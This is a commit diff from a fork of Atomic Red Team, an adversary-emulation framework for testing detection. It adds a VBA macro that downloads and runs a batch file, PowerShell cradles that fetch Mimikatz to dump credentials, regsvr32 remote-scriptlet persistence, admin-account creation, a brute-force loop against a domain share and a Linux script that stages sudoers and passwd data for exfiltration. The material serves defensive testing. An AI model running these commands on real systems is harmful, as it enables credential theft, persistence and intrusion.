security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #1 from redcanaryco/master

Browse Source 
update
This commit is contained in:
Ye Yint @ Rolan
2018-04-16 13:16:41 +08:00
committed by GitHub
parent 87743faf73 b300843c68
commit 5f848fe2c1
185 changed files with 7310 additions and 215 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.gitignore
+4
View File
@@ -0,0 +1,4 @@
.idea
.DS_store
.vscode
.atom
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
Automation/AtomicRedTeam.psd1
BIN
View File
Binary file not shown.
Automation/AtomicRedTeam.psm1
+110
View File
@@ -0,0 +1,110 @@
## Create the directory for invocation proofs
if(-not (Test-Path $env:TEMP\AtomicRedTeam))
{
$null = New-Item -Type Directory $env:TEMP\AtomicRedTeam
}
## Register for cleanup
$MyInvocation.MyCommand.ScriptBlock.Module.OnRemove = {
Remove-Item $env:TEMP\AtomicRedTeam -Recurse
}
$actions = @{
'Windows/Execution/BitsAdmin' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/BitsAdmin.md -SectionName bitsadmin.exe
## Launch the action
Invoke-Expression $commands[0]
}
'Windows/Execution/Trusted_Developer_Utilities/MSBuild' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/Trusted_Developer_Utilities.md -SectionName msbuild.exe
$commandToInvoke,$commandArgs = $commands[0] -split ' '
## Run it, but with the real MSBuildBypass we've got in /Windows/Payloads
& $commandToInvoke ..\Windows\Payloads\MSBuildBypass.csproj
}
'Windows/Lateral_Movement/Remote_Desktop_Protocol_Hijack' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Lateral_Movement/Remote_Desktop_Protocol.md -SectionName 'RDP hijacking'
## Launch the actions
foreach($command in $commands)
{
Invoke-Expression $command 2>&1
}
}
'Windows/Defense_Evasion/Indicator_Removal_on_Host/System' = {
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Defense_Evasion/Indicator_Removal_on_Host.md -SectionName 'wevtutil' |
Where-Object { $_ -match 'System' }
## Launch the action
Invoke-Expression $commands[0]
}
}
}
function Get-ActionCode
{
param($Path, $SectionName)
$sections = Get-Content $Path -Delimiter '###'
,@($sections |
Where-Object { $_ -like "*$SectionName*" } |
Select-String " (.*)" -AllMatches |
ForEach-Object { $_.Matches.Captures.Value.Trim() })
}
function Invoke-Action
{
param(
[Parameter(Mandatory, Position = 0)]
$Action,
[Parameter()]
[Switch] $Force
)
$Action = $Action -replace "\\","/"
foreach($possibleAction in $actions.Keys)
{
if($possibleAction -like $Action)
{
$actionCode = $actions[$possibleAction]
& $actionCode
}
}
}
function Get-Action
{
param(
[Parameter(Position = 0)]
$Action = "*"
)
$Action = $Action -replace "\\","/"
foreach($possibleAction in $actions.Keys)
{
if($possibleAction -like $Action)
{
$possibleAction
}
}
}
Automation/readme.md
+121
View File
@@ -0,0 +1,121 @@
# Automation Framework for the Atomic Red Team
The Atomic Red Team project is unique in that it not only describes the tactics and techiques of the MITRE ATT&CK framework, but it also includes automation of these techniques.
Automation of this framework comes by way of this PowerShell module, ```AtomicRedTeam```.
Here's a quick example:
```
PS > Import-Module .\AtomicRedTeam.psd1
PS > Get-ArtAction Windows/Ex*
Windows/Execution/Trusted_Developer_Utilities/MSBuild
Windows/Execution/BitsAdmin
PS > Invoke-ArtAction Windows/Execution/Trusted_Developer_Utilities/MSBuild
Microsoft (R) Build Engine version 4.7.2556.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 4/15/2018 4:48:44 PM.
Hello From a Code Fragment
Hello From a Class.
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:00.18
PS >
```
As we can see, the MSBuild technique was able to run arbitrary C#.
## Contributing to the Automation Framework
Automation within the Atomic Red Team Framework is largely driven by the self-describing format of the human-readable descriptions. This requires only two things:
1) Unique techniques within a tactic are described through separate markdown H3 ("```###```") tags.
2) Code that demonstrates this technique is within that H3 section, and indented by four spaces. As is often done, this code may be broken into chunks with descriptive text before or after it. This additional content will be ignored.
When you put these together, you get a basic technique description that might look like this:
```
### bitsadmin.exe
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
```
Adding automation of thie technique is as simple as this, in ```AtomicRedTeam.psm1```
```
$actions = @{
'Windows/Execution/BitsAdmin' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/BitsAdmin.md -SectionName bitsadmin.exe
## Launch the action
Invoke-Expression $commands[0]
}
...
```
## Respecting User Systems
Some tests make security-impacting changes to the host. To make sure that this is not done without user awareness, we need to also support the ```-Force``` parameter. We can do that by wrapping our invocation logic with the following code:
```
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
...
}
```
An example of this is in ```Windows/Defense_Evasion/Indicator_Removal_on_Host/System```
```
'Windows/Defense_Evasion/Indicator_Removal_on_Host/System' = {
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Defense_Evasion/Indicator_Removal_on_Host.md -SectionName 'wevtutil' |
Where-Object { $_ -match 'System' }
## Launch the action
Invoke-Expression $commands[0]
}
}
```
## Tweaking Documentation into Code
An action sometimes requires slight modification before evaluating it directly. For example, a portion of the command is left in as an demonstration - but should be replaced with something system-specific. A demonstration of this is from ```'Windows/Execution/Trusted_Developer_Utilities/MSBuild'```:
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
_File.csproj_ is not actually what you want to run - the Atomic Red Team framework includes a sample payload in its ```/Windows/Payloads``` directory. Putting this value in the example itself might muddy the meaning of the content, so we can change it at runtime in the action itself. Here's an example:
```
$actions = @{
...
'Windows/Execution/Trusted_Developer_Utilities/MSBuild' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/Trusted_Developer_Utilities.md -SectionName msbuild.exe
$commandToInvoke,$commandArgs = $commands[0] -split ' '
## Run it, but with the real MSBuildBypass we've got in /Windows/Payloads
& $commandToInvoke ..\Windows\Payloads\MSBuildBypass.csproj
}
...
```
CONTRIBUTIONS.md
+35
View File
@@ -0,0 +1,35 @@
## How to contribute to Atomic Red Team
#### **Atomic Contribution**
Atomic Red Team welcomes all types of contributions as long as it is mapped to [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page).
The Framework is also meant to be "easy". If your Atomic test is complicated and requires multiple external utilities/packages/Kali, we may dismiss it.
TEST YOUR Atomic Test! Be sure to run it from a few OS platforms before submitting a pull to ensure everything is working correctly.
If sourcing from another tool/product (ex. generated command), be sure to cite it in your .md file.
Any and all Payloads need to be placed in the respective Windows|Mac|Linux Payload directory.
Be sure you update the ATT&CK url, Txxxx number, and the title (ex. InstallUtil).
#### Atomic Template Example
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
Linux/Collection/Browser_Extensions.md
+24
View File
@@ -0,0 +1,24 @@
## Browser Extensions
MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176)
### Chrome (Developer Mode)
Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/)
Then click 'Select'
### Chrome (Chrome Web Store)
Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome'
### Firefox
Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json)
Then click 'Open'
Linux/Command_and_Control/Remote_File_Copy.md
+35
View File
@@ -0,0 +1,35 @@
# Remote File Copy
MITRE ATT&CK Technique: [T1105](https://attack.mitre.org/wiki/Technique/T1105)
## Adversary System Configuration
### Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
## Victim System Configuration
### Ensure SSH access has been configured for a victim account
### Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
## Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
## Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
## Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
## Pull file from adversary using scp
